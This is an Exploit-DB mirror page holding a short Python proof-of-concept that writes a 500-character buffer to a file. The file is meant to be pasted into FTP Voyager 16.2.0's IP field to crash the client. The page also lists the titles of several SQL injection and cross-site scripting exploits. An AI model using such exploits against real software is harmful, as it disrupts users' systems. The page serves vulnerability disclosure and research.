exploit-db-mirror/exploits/windows_x86/dos/45527.py
Offensive Security 05328d91a4 DB: 2018-10-04
5 changes to exploits/shellcodes

FTP Voyager 16.2.0 - Denial of Service (PoC)

OPAC EasyWeb Five 5.7 - 'nome' SQL Injection
Zechat 1.5 - 'uname' SQL Injection
Joomla! Component Jimtawl 2.2.7 - 'id' SQL Injection
Airties AIR5342 1.0.0.18 - Cross-Site Scripting
RICOH MP C1803 JPN Printer - Cross-Site Scripting
2018-10-04 05:01:54 +00:00

25 lines
No EOL
864 B
Python
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: FTP Voyager 16.2.0 - Denial of Service (PoC)
# Author: Abdullah Alıç
# Discovey Date: 2018-10-2
# Vendor notified : 2018-10-2
# Homepage: https://www.serv-u.com/
# Software Link: https://www.serv-u.com/ftp-voyager
# Tested Version: 16.2.0
# Tested on OS: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the python exploit script, it will create a new file
# with the name "boom.txt". Copy the content of the new file "boom.txt".
# Start FTP Voyager click "site profiles" >> New site >> Paste the content into field "IP:" field and hit enter!
#!/usr/bin/python
buffer = "A" * 500
payload = buffer
try:
f=open("boom.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"